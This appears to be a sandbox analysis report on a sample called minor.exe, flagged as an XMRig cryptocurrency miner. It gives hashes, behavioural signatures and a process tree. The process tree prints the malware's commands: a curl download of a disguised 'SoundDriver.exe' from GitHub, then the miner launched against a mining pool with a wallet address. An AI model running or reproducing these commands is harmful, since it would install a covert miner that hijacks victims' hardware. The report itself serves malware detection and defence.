Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
2691s -
max time network
2698s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
-
submitted
20/04/2024, 10:40
General
-
Target
minor.exe
-
Size
5.3MB
-
MD5
96e6ccea2851f0c75461f7e87321b14c
-
SHA1
03d9c8014f265984539b57152c2fb5c305eaaf37
-
SHA256
7d3cd7a7f9c7e8a2fa5a244d2a3d3f6bce9f060e0e5cf4ea6700c642f00ed746
-
SHA512
ba7707615e1415632c1ee65b6daaec916b7ee7ff5778f9a405201d756714445ba1213006077356db8db0cb7a36afe9bfc86ec076f09cf2f99f5f0eaa8660cf55
-
SSDEEP
98304:QxfbbSECv84zUSzp1jkGVZiS0aOQQTNgVqMbCYn9MPx8cLfDzz/OIa8f:vXvfUSzrlVZiS0Xzg5/MmAba8
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
-
Loads dropped DLL 4 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Modifies registry class 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of FindShellTrayWindow 5 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\minor.exe"C:\Users\Admin\AppData\Local\Temp\minor.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\onefile_5088_133580832305146105\minor.exe"C:\Users\Admin\AppData\Local\Temp\minor.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl -L -k https://github.com/mzusi/m/raw/main/SoundDriver.exe -o driver.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl -L -k https://github.com/mzusi/m/raw/main/SoundDriver.exe -o driver.exe4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\driver.exe" --donate-level 1 --max-cpu-usage 60 -o pool.hashvault.pro:3333 -u 49WNFqsKfkfEsSuUf95s6YVai7nwsonYBGqnvfqrxsL3TWZSaYB6s5NZBekBcSVtq91FxWbnaAiVD5pT42whvANq48hHL7b -p minor -k"3⤵
-
C:\Users\Admin\AppData\Local\Temp\driver.exe"C:\Users\Admin\AppData\Local\Temp\driver.exe" --donate-level 1 --max-cpu-usage 60 -o pool.hashvault.pro:3333 -u 49WNFqsKfkfEsSuUf95s6YVai7nwsonYBGqnvfqrxsL3TWZSaYB6s5NZBekBcSVtq91FxWbnaAiVD5pT42whvANq48hHL7b -p minor -k4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2000.0.481564044\678698997" -parentBuildID 20230214051806 -prefsHandle 1756 -prefMapHandle 1740 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {47d6e11d-886c-439b-b039-651929d9925d} 2000 "\\.\pipe\gecko-crash-server-pipe.2000" 1848 21977f10b58 gpu3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2000.1.1810600589\465116592" -parentBuildID 20230214051806 -prefsHandle 2388 -prefMapHandle 2376 -prefsLen 22112 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {18a5385a-b554-4309-8d13-6bf0f05122d8} 2000 "\\.\pipe\gecko-crash-server-pipe.2000" 2416 2196b187b58 socket3⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2000.2.918396618\2068692300" -childID 1 -isForBrowser -prefsHandle 2776 -prefMapHandle 2772 -prefsLen 22150 -prefMapSize 235121 -jsInitHandle 1268 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6b0bc0e8-4bcc-4722-88b4-d9eae690d2af} 2000 "\\.\pipe\gecko-crash-server-pipe.2000" 3076 21976f91a58 tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2000.3.1155062311\1368178531" -childID 2 -isForBrowser -prefsHandle 3648 -prefMapHandle 3644 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1268 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9db2924e-85e9-4e4c-b5e9-d636d909c7fc} 2000 "\\.\pipe\gecko-crash-server-pipe.2000" 3660 2197ca87658 tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2000.4.263937565\1192140233" -childID 3 -isForBrowser -prefsHandle 5156 -prefMapHandle 4836 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1268 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2b589bd9-a264-450d-8581-66ea5963cd39} 2000 "\\.\pipe\gecko-crash-server-pipe.2000" 5164 2196b17a258 tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2000.5.921802428\1184715713" -childID 4 -isForBrowser -prefsHandle 5288 -prefMapHandle 5292 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1268 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0a5180c6-02eb-40e1-9be8-1227da67e6a6} 2000 "\\.\pipe\gecko-crash-server-pipe.2000" 5276 2197d786858 tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2000.6.429212559\1452943140" -childID 5 -isForBrowser -prefsHandle 5544 -prefMapHandle 5540 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1268 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {27de36a8-58ab-48c7-b0d0-3ee6bee3fe59} 2000 "\\.\pipe\gecko-crash-server-pipe.2000" 5552 2197ee88458 tab3⤵
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k UnistackSvcGroup1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
23KB
MD562c67c2a0dd521044dd12af3f2d843d5
SHA1a385c3a055d1f14da42601cc32efcbe03c7c3cea
SHA256ec962d5dd33ffe9e71222f8bff766a8859a9361c0d97690fa6c1f62c425bc3c6
SHA51254bb4f1f980c5e7703d15a097998e22dc0bc195e330009013381f08dba16ee22df8b13bc9869d3d1c673eb17e65c38a33e5c501a146f1965ba32233f7c845ea1
-
Filesize
81KB
MD54101128e19134a4733028cfaafc2f3bb
SHA166c18b0406201c3cfbba6e239ab9ee3dbb3be07d
SHA2565843872d5e2b08f138a71fe9ba94813afee59c8b48166d4a8eb0f606107a7e80
SHA5124f2fc415026d7fd71c5018bc2ffdf37a5b835a417b9e5017261849e36d65375715bae148ce8f9649f9d807a63ac09d0fb270e4abae83dfa371d129953a5422ca
-
Filesize
154KB
MD5337b0e65a856568778e25660f77bc80a
SHA14d9e921feaee5fa70181eba99054ffa7b6c9bb3f
SHA256613de58e4a9a80eff8f8bc45c350a6eaebf89f85ffd2d7e3b0b266bf0888a60a
SHA51219e6da02d9d25ccef06c843b9f429e6b598667270631febe99a0d12fc12d5da4fb242973a8351d3bf169f60d2e17fe821ad692038c793ce69dfb66a42211398e
-
Filesize
5.1MB
MD599aa369598e5d8eba59b7d0f0a8429f9
SHA17baaf6546112049038e4c62143ce7dd77c3a97c9
SHA2568174ccc5cfae43503648608ba6ae14b00679517591a2cdff9017c4be2ab2996b
SHA5123fdb8674033d6736bb548c262f54e1277c196fb83c3bfcc6dbe9b8bb126fb3f8404b6385f666b389e5ea84ab7261bcb65dddd88e39c53d3d0e6813dd9212c62f
-
Filesize
96KB
MD5f12681a472b9dd04a812e16096514974
SHA16fd102eb3e0b0e6eef08118d71f28702d1a9067c
SHA256d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8
SHA5127d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2
-
Filesize
6.6MB
MD5efad0224514af668288b4fd8eaec05c1
SHA19807444d6c2598c09d2904545b23d0c56655f424
SHA25680ddb2503286195ed3dbea2c3e36c79a2214b0d2a5465af766a3d19fe69a5227
SHA512d8115457b6984ae69675020a28767795420acce7428a2476f22357bc06b11da643919d134c6d274673098713a33c2627e3bb67a08ea491002fc0a31b1a6e1e07
-
Filesize
5.5MB
MD59a24c8c35e4ac4b1597124c1dcbebe0f
SHA1f59782a4923a30118b97e01a7f8db69b92d8382a
SHA256a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7
SHA5129d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b
-
Filesize
6KB
MD550c0ec8689ae153eb0c3d0d70a8cf118
SHA17cc185c3926a5c1fe93b581116de48ee884207e0
SHA25679d028501401bf334c71ad6be794d52f84668ba9c7227e020224813552219465
SHA5126af102df5b1601d2a665dd1cc586591be9f55e1414ee2e7cf88489e203b6a4e7d3b61b839476a680174a4fe004d08efa18c760b68dcee6a79795c43ed700cf6e
-
Filesize
6KB
MD5e92416ec599178f21914086687d799ee
SHA13b440431da34f0f9769ce4743e88ccc4754b75e8
SHA256cd6817737a282f36dbd9ac3c076b9639d4810c6fac6fd195767b695a3b7a4cd6
SHA5123fe19721a6d09560877aad0e8af797f62e88953f779a5726d205b5526ea560958d5b5d84ea4ca33750af086a1aef44627ee181f955e8cc02884166f55d1ae34f
-
Filesize
6KB
MD5b509d999cefe0134d5627c0b36cb47be
SHA19edd042886b6629127a68c771918969a37287357
SHA2563fd9dfc88ac11dab5fc265bbde5e4ae6a50115ead598682fc2bbb9daae99153a
SHA51243d5b6df69efaeb5f7a08cdf5464a222d9e060abd1a006bc0f465c26106278244a090a54dc16ad6c6d3a198d91c1f8f3adfdc718b90301bc30d57e89f3ae9647
-
Filesize
921B
MD5b00b15e87414284f6315b0fbe0ab65b0
SHA1090ecdb13fad3625cfaf8214f4ae741544246fc1
SHA256d06edbeea32cdb6a26d0da721c742a6c8856240688b2822f4b341162175e6702
SHA51233f0af577fd5863a5da559080d1774e96dae82d64eb36b5b9a4e5903304aa27e6f2156ace411839db67b129112b444d74976b7f4a5da42f30a03fcb06b06a1e9
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
6.7MB
-
Filesize
6.7MB
-
Filesize
5.4MB